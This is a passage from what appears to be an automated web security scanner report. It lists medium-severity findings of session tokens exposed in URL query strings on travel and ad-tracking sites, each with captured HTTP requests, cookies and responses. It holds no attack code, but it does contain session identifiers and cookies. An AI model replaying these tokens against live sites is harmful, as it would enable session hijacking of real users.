<link rel="shortcut icon" href="https://axptravel.americanexpress.com/ctnwt/favicon.ico"/>


...[SNIP]...
10.9. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=7d351c60-8078-42ee-9ccb-be1d48290039&hostname=www.igougo.com&location=%2Ftraveldeals%2Fratefinder.aspx&url=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&sessionID=1317601622396.31525&fpc=3de0670-132c72d397d-d7082d6-1&ts1317601643777.0&refDomain=www.travelocity.com&refQuery=theDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 03 Oct 2011 00:27:27 GMT
Connection: keep-alive

10.10. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://lb-static1-1568763564.us-east-1.elb.amazonaws.com
Path:   /pix.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pix.gif?acct_id=4079&ptype=other&cat=HOTEL&is_paid=0&prod_id=&prod_name=&search_term=&session_id=DFE4F06BE571072B&is_conversion=&basket_value=&order_id=&version=0.2&url=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&ref=http%3A%2F%2Fdrf-global.com%2Fservicegateway%2Fglobaltrips-shopping-svcs%2Fdrfadserver-1.0%2Fpub%2Frf%3Flob%3DHOTEL%26advertiserName%3Dorbitz%26grp%3D9705%26placeholderUrl%3Dhttp%253A%252F%252Fwww.travelocity.com%252Fvstrack%253FWA1%253D03020%2526WA3%253D742%2526WA5%253DDRFContinue%2526WA6%253Dair%2526dst%253Durl_placeholder%26url%3Dhttp%253A%252F%252Fad.doubleclick.net%252Fclk%253B141652382%253B20702477%253Ba%253Fhttp%253A%252F%252Fwww.orbitz.com%252Fpsi%253Ftype%253Dhotel%2526market%253D%2524%257Bcity%257D%252C%2524%257Bcountryn%257D%2526checkin%253D%2524%257BdepartureDate%253Ad%253A%2522yyyy-mm-dd%2522%257D%2526checkout%253D%2524%257BreturnDate%253Ad%253A%2522yyyy-mm-dd%2522%257D%2526guests%253D%2524%257Badults%257D%2526rooms%253D%2524%257Brooms%257D%2526WT.mc_id%253Do_igo_merch_city_dated%2526WT.mc_ev%253Dclick%2526gcid%253DC11287x600-CY%2524%257Bcity%257D%252C%2524%257Bcountryn%257D%26pid%3Dc3919e40-e5b8-49f8-b876-4fed1f31968f%26sid%3Dbfa7dd53-c988-458c-86df-52443affccb8%26uid%3D20d9c1fc-61a4-45f0-9524-380e68994c01%26widget%3DH_PopUnder%26pti%3Ddefault%26src%3Dnone%26ppi%3D4a15630f-e16d-42c4-95d2-0852b73fdd75%26ctx%3D92aa9504-b6eb-4091-8b93-6582f63d9555%26ccn%3D1%26cgn%3D153%26pos%3D0%26aii%3De3898191-1452-431e-82b6-c9f881ca9a4c%26%2524cc%3DUS%26%2524rc%3DUS%26%2524adults%3D1%26%2524destination%3DBoston%252C%2520MA%2520Massachusetts%26%2524gls&tr=1 HTTP/1.1
Host: lb-static1-1568763564.us-east-1.elb.amazonaws.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:12:03 GMT
ETag: "1104880613"
Last-Modified: Wed, 29 Jul 2009 00:45:42 GMT
Server: lighttpd/1.4.19
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;
10.11. http://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://maps.googleapis.com
Path:   /maps/api/js/StaticMapService.GetMapImage

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /maps/api/js/StaticMapService.GetMapImage?1m2&1i2096887&2i2096946&2e1&3u14&4m2&1u530&2u412&5m3&1e0&2b1&5sen&token=78185 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.expedia.com/Hotel-Search?olacid=US.BD.IGOUGO-US.HOTEL.HOTEL&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/png
Date: Mon, 03 Oct 2011 00:00:01 GMT
Expires: Tue, 04 Oct 2011 00:00:01 GMT
Server: staticmap
Content-Length: 138
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Cache-Control: public, max-age=86400
Age: 759

.PNG
.
...IHDR.....................PLTE..............bKGD...-....2IDATx...1.......Om.............................>mp..uc.7....IEND.B`.
10.12. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://orbitz.tt.omtrdc.net
Path:   /m2/orbitz/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/orbitz/mbox/standard?mboxHost=www.orbitz.com&mboxSession=1317600406536-142286&mboxPage=1317600562009-125559&screenHeight=1200&screenWidth=1920&browserWidth=700&browserHeight=700&browserTimeOffset=-300&colorDepth=16&mboxCount=2&numberOfNights=3&numberOfRooms=1&hotelSRNavigationSegment=1&mbox=hotel200&mboxId=0&mboxTime=1317582605700&mboxURL=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&mboxVersion=39 HTTP/1.1
Host: orbitz.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 89
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Test & Target

mboxFactories.get('default').get('hotel200',0).setOffer(new mboxOfferDefault()).loaded();
10.13. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/orbitzaway/mbox/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=2&mbox=trip_landing_providers_onload&mboxId=0&mboxTime=1317584100695&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 184
Date: Mon, 03 Oct 2011 00:35:03 GMT
Server: Test & Target

mboxFactories.get('default').get('trip_landing_providers_onload',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");
10.14. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/sc/standard  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://orbitzaway.tt.omtrdc.net
Path:   /m2/orbitzaway/sc/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /m2/orbitzaway/sc/standard?mboxHost=www.trip.com&mboxSession=1317602099178-690078&mboxPage=1317602099178-690078&mboxCount=3&mbox=SiteCatalyst%3A%20event&mboxId=0&mboxTime=1317584104035&visitorNamespace=orbitzaway&pageName=Flights&currencyCode=USD&channel=Compare_Rates&server=trip.com&campaign=1&events=event2&resolution=1920x1200&colorDepth=16&javascriptVersion=1.6&javaEnabled=Y&cookiesEnabled=Y&browserWidth=0&browserHeight=0&trackDownloadLinks=true&trackExternalLinks=true&trackInlineStats=true&linkLeaveQueryString=false&linkDownloadFileTypes=exe%2Czip%2Cwav%2Cmp3%2Cmov%2Cmpg%2Cavi%2Cwmv%2Cpdf%2Cdoc%2Cdocx%2Cxls%2Cxlsx%2Cppt%2Cpptx&linkInternalFilters=javascript%3A%2Ctrip.com&linkTrackVars=None&linkTrackEvents=None&prop8=Data%20Not%20Available&eVar8=Data%20Not%20Available&prop9=Data%20Not%20Available&eVar9=Data%20Not%20Available&prop10=Data%20Not%20Available&eVar10=Data%20Not%20Available&eVar11=Flights&eVar12=Compare_Rates&mboxURL=http%3A%2F%2Fwww.trip.com%2F%3Ftype%3Dair%26utm_source%3Dorbitz%26utm_medium%3Dcrpopunder%26utm_content%3Dair%26utm_campaign%3Dtriplooking%26cmpid%3D1&mboxReferrer=&mboxVersion=38&scPluginVersion=1 HTTP/1.1
Host: orbitzaway.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.trip.com/?type=air&utm_source=orbitz&utm_medium=crpopunder&utm_content=air&utm_campaign=triplooking&cmpid=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
Content-Length: 220
Date: Mon, 03 Oct 2011 00:35:07 GMT
Server: Test & Target

if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').getPCId().forceId("1317602099178-690078.19");mboxFactories.get('default').get('SiteCatalyst: event', 0).setOffer(new mboxOfferD
...[SNIP]...
10.15. http://rs.gwallet.com/r1/pixel/x1743  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1743

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /r1/pixel/x1743 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Headlines/0,,12306~2469333,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_oo=1; ra1_uid=4711648038188259648

Response

HTTP/1.1 200 OK
Content-Length: 140
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Mon, 01-Oct-2012 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=DDX1; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Sun, 02-Oct-2016 23:49:40 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://bh.contextweb.com/bh/set.aspx?action=clr&advid=3420&token=RORO1" width="1" height="1" border="0"></body></html>
10.16. http://travel.travelocity.com/___waseq.img  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /___waseq.img

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /___waseq.img?Log=1&tntPage=http%3A//www.travelocity.com/&tntTitle=&tntReferrer=http%3A//www.travelocity.com/resolve/default&tntCampaignID=27980&tntCampaignName=HMP%20Cannonball%20TestID%20472%20%28Austin%29%20PROD&tntRecipeID=2&tntRecipeName=Page%20472a&tntTrafficType=0&tntOfferID=129900&tntMbox=HMP&tntPCID=1317600481056-80236.19&tntSessionID=1317600481056-80236&tntFirstSession=true&tntPageID=1317600481056-80236&tntTime=1317600482344 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; mbox=check#true#1317600542|session#1317600481056-80236#1317602342

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:05 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Location: http://i.travelocity.com/t.gif
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

10.17. http://travel.travelocity.com/hotel/HotelAvailability.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /hotel/HotelAvailability.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city& HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSID=50C7F54C8E08272A256D4F9FCD45DA82.p0611; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Set-Cookie: JSESSIONID=; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: SID=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ex.lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lb.entity=; Domain=.travelocity.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Location: http://travel.travelocity.com/hotel/HotelAvailability.do?.stc=50C7F54C8E08272A256D4F9FCD45DA82.p0611&dateFormat=mm/dd/yyyy&Service=TRAVELOCITY&cityCountryCode=US&city=bos&returningDate=mm/dd/yyyy&leavingDate=mm/dd/yyyy&searchMode=city&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

10.18. http://travel.travelocity.com/hotel/HotelDetail.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /hotel/HotelDetail.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:34 GMT
Server: Apache
Set-Cookie: JSID=A7716E473BF556C6BB6CA1860CF34A22.p0717; Domain=.travelocity.com; Path=/
Set-Cookie: Service=TRAVELOCITY; Domain=.travelocity.com; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113893

<!--
JSESSIONID = A7716E473BF556C6BB6CA1860CF34A22.p0717
TPSESSIONID = T0075003076751026003112815903110013629
Service = TRAVELOCITY
TYRG1ST = 51B82D43BB8E25C5
--><script type="text/javascript">var j
...[SNIP]...
10.19. http://travel.travelocity.com/pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pub/gwt/hotel/esf/3EF72E9199C4983B05BF027C4F5C4217.cache.html?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:59 GMT
Server: Apache
ETag: W/"359346-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 359346

<html><head><script>var $gwt_version = "2.0.0";var $wnd = parent;var $doc = $wnd.document;var $moduleName, $moduleBase;var $strongName = '3EF72E9199C4983B05BF027C4F5C4217';var $stats = $wnd.__gwtStats
...[SNIP]...
10.20. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/NoCacheAction.do

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pub/gwt/hotel/esf/NoCacheAction.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617&service=TRAVELOCITY HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; mbox=check#true#1317600585|session#1317600481056-80236#1317602385|PC#1317600481056-80236.19#1318810125; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSID=4624190710EDB02407F82A5D5E671CC4.p0739; Domain=.travelocity.com; Path=/
ETag: W/"4888-1316720620000"
Last-Modified: Thu, 22 Sep 2011 19:43:40 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 4888

function esf(){var M='',nb='" for "gwt:onLoadErrorFn"',lb='" for "gwt:onPropertyErrorFn"',Y='"><\/script>',$='#',Lb='.cache.html?jsessionid='+jsessionid,ab='/',Fb='226C4CC2E5A5A4FBE9703DC949A8A7C5',Gb
...[SNIP]...
10.21. http://travel.travelocity.com/pub/gwt/hotel/esf/hotelresultlist.gwt-rpc  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://travel.travelocity.com
Path:   /pub/gwt/hotel/esf/hotelresultlist.gwt-rpc

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /pub/gwt/hotel/esf/hotelresultlist.gwt-rpc;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617 HTTP/1.1
Host: travel.travelocity.com
Proxy-Connection: keep-alive
Content-Length: 205
Origin: http://travel.travelocity.com
X-GWT-Module-Base: http://travel.travelocity.com/pub/gwt/hotel/esf/
X-GWT-Permutation: 3EF72E9199C4983B05BF027C4F5C4217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: text/x-gwt-rpc; charset=UTF-8
Accept: */*
